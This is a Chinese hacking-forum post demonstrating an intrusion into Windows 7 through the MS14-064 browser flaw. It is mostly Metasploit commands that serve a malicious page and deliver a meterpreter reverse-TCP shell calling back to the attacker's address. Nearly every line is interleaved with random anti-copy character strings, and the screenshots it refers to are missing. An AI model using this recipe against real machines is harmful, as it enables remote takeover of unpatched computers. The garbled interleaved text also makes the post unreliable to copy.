找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1398|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

Y+ y. z4 v% O) ^ 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示3 {* A& G0 d* K) C6 w

* I; H1 E T5 ]5 J

& \; c# G) f9 n 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: , t* U0 C+ P/ f! ~; P- m8 ~* P; c! u0 R

0 g! x" b, m8 y4 D/ l

$ X* }6 ^4 h) r/ h, W 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp% P$ {) q* a: J6 T

$ Q, [6 ]3 ]1 Q

0 n" d% G1 R9 t             set AllowPowershellPrompt true& K$ z# G! P3 Z6 t7 Z+ B6 |

5 ^/ q5 F' L2 h7 a' K) D

; D! A" q2 S4 s0 {4 C             Set LHOST 192.168.0.109 , W! A& W6 ^, D7 r6 [1 [

( R2 s3 `. L, I+ y

/ `2 I- |5 D4 ]4 C9 b7 F a             set SRVHOST 192.168.0.1097 I- g. B4 I0 K, y5 |

2 S, y0 H1 S: _, a

( Z8 F1 R7 x8 V" p. k0 l             Set uripath share; X9 {5 K1 ], [4 Y

+ |' j* s- S9 j

7 V3 A) x; ]0 x" b( b& g$ O             Set srvport 80 3 y9 X/ A4 b# y. u y ]' U5 P0 {

: d. Z( _, n2 k

. t5 ~7 Z; B) p$ C5 l   K$ _; c! V+ T4 S

- O- z) I' F0 a" s

( E6 }# n4 ? }$ U( w3 o7 ]1 n9 g   2 ?* [2 X0 {/ g

& a8 U8 H6 ~% P7 E2 r) X0 v/ {

" M4 q# T# b8 a* [! a6 g) c* R   # I$ N0 x: N( a5 B) \

/ P0 t, n. b! z! S8 I* A( n

, K- k0 s4 ?- D2 }   ) b( ]% H) F% c+ r2 _/ {( X' p

5 V+ ~8 ^$ A, T% a4 y9 e1 n( c- E

1 y$ Z% b9 @0 z- Y9 e) Q   & R/ B& g- a3 f" H$ b* r

* ^9 ^% s" `) Q- L6 L2 R/ b

* u5 l G- H1 T/ i5 ` 下面我们来访问本地地址如图: 6 ?6 B0 M X' D" h

8 g5 b- ]. k- l" p5 _. w( i+ G N

( } I4 J" t; }5 r* `! Z- I1 L- [  : _' c y2 G4 y$ i' A) T

6 h* F% k% q4 R; u. a: x8 o+ t. z

+ R0 y! K+ d3 n8 {9 g9 K8 f   & b3 ]8 m; j" A

. k0 G9 X b2 K

; `6 i+ }. q! x! c; x2 W- X / u) `, l' }: g! F- c- W+ q: L2 ]

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表